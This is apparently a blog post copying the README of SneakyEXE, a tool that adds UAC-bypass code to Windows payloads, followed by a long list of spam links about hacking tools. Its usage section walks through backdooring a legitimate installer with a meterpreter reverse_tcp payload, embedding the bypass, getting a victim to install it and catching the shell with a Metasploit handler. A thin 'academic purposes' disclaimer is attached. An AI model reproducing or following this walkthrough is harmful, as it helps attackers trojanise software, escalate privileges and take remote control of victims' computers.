domingo, 30 de agosto de 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


Related articles
  1. Hack App
  2. Pentest Tools Online
  3. Pentest Tools Subdomain
  4. Github Hacking Tools
  5. Hacking Tools Windows 10
  6. Hacking Tools Windows
  7. Hack Tools
  8. Pentest Reporting Tools
  9. Tools Used For Hacking
  10. Hackrf Tools
  11. Pentest Tools Url Fuzzer
  12. Hacker Tools
  13. Hacker Tools Free Download
  14. How To Hack
  15. Underground Hacker Sites
  16. Hacker Tools Apk
  17. Pentest Recon Tools
  18. Pentest Tools Github
  19. Hacker Tools Hardware
  20. Pentest Tools Online
  21. Pentest Tools Review
  22. Pentest Recon Tools
  23. Hack Rom Tools
  24. Github Hacking Tools
  25. Hack Tools Download
  26. Hacking Tools Windows
  27. Beginner Hacker Tools
  28. Nsa Hack Tools Download
  29. Pentest Automation Tools
  30. Pentest Tools Free
  31. Pentest Tools Download
  32. Kik Hack Tools
  33. Hacking Tools 2020
  34. Wifi Hacker Tools For Windows
  35. Pentest Tools
  36. Pentest Tools Download
  37. Wifi Hacker Tools For Windows
  38. Hacker Search Tools
  39. Hacker Tools List
  40. Hack Rom Tools
  41. World No 1 Hacker Software
  42. Pentest Tools For Ubuntu
  43. Hack Rom Tools
  44. Hacker Tools Free Download
  45. Tools Used For Hacking
  46. How To Make Hacking Tools
  47. Hacks And Tools
  48. Hacks And Tools
  49. Hacking Tools Usb
  50. Physical Pentest Tools
  51. Nsa Hack Tools
  52. Pentest Tools Alternative
  53. Hack Rom Tools
  54. Hacking Tools For Mac
  55. Top Pentest Tools
  56. Hacking Tools Usb
  57. Pentest Automation Tools
  58. Pentest Tools List
  59. Best Hacking Tools 2019
  60. Pentest Tools Subdomain
  61. Best Pentesting Tools 2018
  62. Hacker Tools Free
  63. Hak5 Tools
  64. Hacker Tools For Pc
  65. Wifi Hacker Tools For Windows
  66. Hacker Hardware Tools
  67. Hacking Tools Windows 10
  68. Pentest Tools Nmap
  69. Hack Tools
  70. Hack Rom Tools
  71. Nsa Hack Tools Download
  72. Pentest Box Tools Download
  73. Pentest Tools Port Scanner
  74. Hacking Tools Software
  75. Termux Hacking Tools 2019
  76. How To Make Hacking Tools
  77. Hacker Tools
  78. Hacker Tool Kit
  79. Hack And Tools
  80. Hacker Hardware Tools
  81. Termux Hacking Tools 2019
  82. Hack Tools Online
  83. Hacking Tools For Kali Linux
  84. Pentest Tools For Android
  85. Hacker Tools Online
  86. Hacks And Tools
  87. Hack Tools Download
  88. How To Install Pentest Tools In Ubuntu
  89. Hacking Tools
  90. Hacking Tools Kit
  91. Pentest Tools Tcp Port Scanner
  92. Hacker Tools 2020
  93. Hacker Tools For Windows
  94. Hacker Tools Online
  95. Hacking Tools For Windows 7
  96. Hack Website Online Tool
  97. Hack Tools
  98. Pentest Tools Linux
  99. Hacker Tools 2020
  100. Underground Hacker Sites
  101. Hacking Tools Hardware
  102. Hacker Tools List
  103. Pentest Tools For Ubuntu
  104. Pentest Tools Linux
  105. Hacker Tools For Pc
  106. Hacker Tools Apk
  107. Github Hacking Tools
  108. Pentest Tools Linux
  109. Hacker Hardware Tools

No hay comentarios:

Publicar un comentario